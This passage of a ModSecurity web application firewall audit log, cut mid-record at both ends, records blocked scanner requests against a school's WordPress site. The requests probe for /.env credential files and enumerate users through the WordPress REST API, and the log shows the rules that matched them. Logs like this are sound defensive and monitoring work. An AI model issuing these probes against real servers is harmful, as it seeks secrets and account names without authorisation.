REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750002379816409 3575 (- - -) Stopwatch2: 1750002379816409 3575; combined=1484, p1=487, p2=965, p3=0, p4=0, p5=32, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10acfc4f-Z-- --27f4736a-A-- [15/Jun/2025:22:55:45 +0700] aE7tAYZIfYpKBvn-jB75-QAAAFU 103.236.140.4 34618 103.236.140.4 8181 --27f4736a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 97.133.58.32 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 97.133.58.32 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: */* --27f4736a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27f4736a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750002945410989 920 (- - -) Stopwatch2: 1750002945410989 920; combined=337, p1=292, p2=0, p3=0, p4=0, p5=45, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27f4736a-Z-- --eee14466-A-- [15/Jun/2025:22:57:59 +0700] aE7thz2YoubFl106kA3_MAAAAI0 103.236.140.4 34624 103.236.140.4 8181 --eee14466-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.153.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.153.102 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eee14466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eee14466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750003079912961 3385 (- - -) Stopwatch2: 1750003079912961 3385; combined=1475, p1=518, p2=923, p3=0, p4=0, p5=34, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eee14466-Z-- --39276e4d-A-- [15/Jun/2025:23:06:39 +0700] aE7vjz2YoubFl106kA3_NQAAAIA 103.236.140.4 34676 103.236.140.4 8181 --39276e4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.27.227.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.27.227.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --39276e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --39276e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750003599120531 2394 (- - -) Stopwatch2: 1750003599120531 2394; combined=1165, p1=415, p2=724, p3=0, p4=0, p5=26, sr=145, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --39276e4d-Z-- --f1cc1634-A-- [15/Jun/2025:23:16:25 +0700] aE7x2br7GPil_2h-MzY2BwAAANg 103.236.140.4 34722 103.236.140.4 8181 --f1cc1634-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --f1cc1634-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1cc1634-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750004185191294 916 (- - -) Stopwatch2: 1750004185191294 916; combined=333, p1=291, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1cc1634-Z-- --a2eed360-A-- [15/Jun/2025:23:21:00 +0700] aE7y7Lr7GPil_2h-MzY2CwAAAMU 103.236.140.4 34754 103.236.140.4 8181 --a2eed360-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 104.248.78.73 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 104.248.78.73 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --a2eed360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2eed360-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750004460394954 19733 (- - -) Stopwatch2: 1750004460394954 19733; combined=37261, p1=383, p2=0, p3=0, p4=0, p5=18459, sr=118, sw=0, l=0, gc=18419 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2eed360-Z-- --25bca027-A-- [15/Jun/2025:23:38:30 +0700] aE73Bj2YoubFl106kA3_RwAAAIk 103.236.140.4 34806 103.236.140.4 8181 --25bca027-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --25bca027-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --25bca027-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750005510662916 951 (- - -) Stopwatch2: 1750005510662916 951; combined=439, p1=397, p2=0, p3=0, p4=0, p5=42, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --25bca027-Z-- --86a1d62a-A-- [16/Jun/2025:00:08:50 +0700] aE7-Ij2YoubFl106kA3_UQAAAIM 103.236.140.4 34916 103.236.140.4 8181 --86a1d62a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 129.222.37.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 129.222.37.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept: */* --86a1d62a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --86a1d62a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750007330808639 923 (- - -) Stopwatch2: 1750007330808639 923; combined=350, p1=308, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86a1d62a-Z-- --cbbcd805-A-- [16/Jun/2025:00:42:50 +0700] aE8GGrr7GPil_2h-MzY4mwAAAMY 103.236.140.4 44260 103.236.140.4 8181 --cbbcd805-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --cbbcd805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbbcd805-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750009370531558 882 (- - -) Stopwatch2: 1750009370531558 882; combined=366, p1=311, p2=0, p3=0, p4=0, p5=55, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbbcd805-Z-- --4219821e-A-- [16/Jun/2025:00:52:06 +0700] aE8IRrr7GPil_2h-MzY6MAAAAMM 103.236.140.4 47194 103.236.140.4 8181 --4219821e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 14.241.104.207 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.241.104.207 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4219821e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4219821e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750009926031186 3128 (- - -) Stopwatch2: 1750009926031186 3128; combined=1373, p1=467, p2=875, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4219821e-Z-- --70ad7a14-A-- [16/Jun/2025:01:16:01 +0700] aE8N4br7GPil_2h-MzY9QAAAAM4 103.236.140.4 55360 103.236.140.4 8181 --70ad7a14-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.128 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --70ad7a14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --70ad7a14-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750011361668582 2875 (- - -) Stopwatch2: 1750011361668582 2875; combined=1316, p1=423, p2=858, p3=0, p4=0, p5=34, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70ad7a14-Z-- --97c01e2a-A-- [16/Jun/2025:01:34:43 +0700] aE8SQ7r7GPil_2h-MzY-3wAAAM8 103.236.140.4 33002 103.236.140.4 8181 --97c01e2a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.92.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.92.83 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.32.3 Accept: */* --97c01e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97c01e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750012483535755 891 (- - -) Stopwatch2: 1750012483535755 891; combined=368, p1=304, p2=0, p3=0, p4=0, p5=64, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97c01e2a-Z-- --30404740-A-- [16/Jun/2025:01:35:23 +0700] aE8Sa_GguMGNwgSGIMxYYAAAAAM 103.236.140.4 33230 103.236.140.4 8181 --30404740-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 156.146.36.87 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 156.146.36.87 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --30404740-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30404740-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750012523143520 938 (- - -) Stopwatch2: 1750012523143520 938; combined=356, p1=304, p2=0, p3=0, p4=0, p5=52, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30404740-Z-- --51433674-A-- [16/Jun/2025:02:20:20 +0700] aE8c9D2YoubFl106kA0JTgAAAIs 103.236.140.4 47514 103.236.140.4 8181 --51433674-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27 Accept-Charset: utf-8 --51433674-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51433674-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750015220700736 847 (- - -) Stopwatch2: 1750015220700736 847; combined=382, p1=344, p2=0, p3=0, p4=0, p5=38, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51433674-Z-- --b882df56-A-- [16/Jun/2025:02:26:24 +0700] aE8eYLr7GPil_2h-MzZCvQAAAMA 103.236.140.4 50548 103.236.140.4 8181 --b882df56-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 176.57.210.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.57.210.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b882df56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b882df56-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750015584123383 2882 (- - -) Stopwatch2: 1750015584123383 2882; combined=1155, p1=460, p2=672, p3=0, p4=0, p5=23, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b882df56-Z-- --f30ef238-A-- [16/Jun/2025:03:40:10 +0700] aE8vqh9AUmrZE8TgO0U4NgAAAEI 103.236.140.4 55062 103.236.140.4 8181 --f30ef238-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 165.98.136.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 165.98.136.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f30ef238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f30ef238-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750020010742096 3529 (- - -) Stopwatch2: 1750020010742096 3529; combined=1554, p1=580, p2=944, p3=0, p4=0, p5=30, sr=181, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f30ef238-Z-- --5ef41578-A-- [16/Jun/2025:03:58:36 +0700] aE8z_B9AUmrZE8TgO0U5nwAAAFg 103.236.140.4 57266 103.236.140.4 8181 --5ef41578-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.166.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.166.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5ef41578-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ef41578-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750021116186835 2705 (- - -) Stopwatch2: 1750021116186835 2705; combined=1442, p1=490, p2=923, p3=0, p4=0, p5=29, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ef41578-Z-- --5e1c0f1f-A-- [16/Jun/2025:04:38:15 +0700] aE89R9PYN2mzu-AuhSNhjQAAAA8 103.236.140.4 53008 103.236.140.4 8181 --5e1c0f1f-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 149.102.229.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 149.102.229.174 X-Forwarded-Proto: http Connection: close --5e1c0f1f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e1c0f1f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1750023495690500 619 (- - -) Stopwatch2: 1750023495690500 619; combined=216, p1=186, p2=0, p3=0, p4=0, p5=30, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e1c0f1f-Z-- --47d6cb09-A-- [16/Jun/2025:05:28:45 +0700] aE9JHdPYN2mzu-AuhSNxegAAAAo 103.236.140.4 53738 103.236.140.4 8181 --47d6cb09-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.46.152.133 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.46.152.133 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --47d6cb09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d6cb09-H-- Message: Access denied with code 403 (phase 2). 
Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1750026525224027 3023 (- - -) Stopwatch2: 1750026525224027 3023; combined=1377, p1=490, p2=833, p3=0, p4=0, p5=53, sr=150, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d6cb09-Z-- --2b47c26c-A-- [16/Jun/2025:06:18:20 +0700] aE9UvC-4qihuRDlKQ4lJ7QAAAMA 103.236.140.4 48038 103.236.140.4 8181 --2b47c26c-B-- GET /shop/.env HTTP/1.0 Host: 103.236.140.4 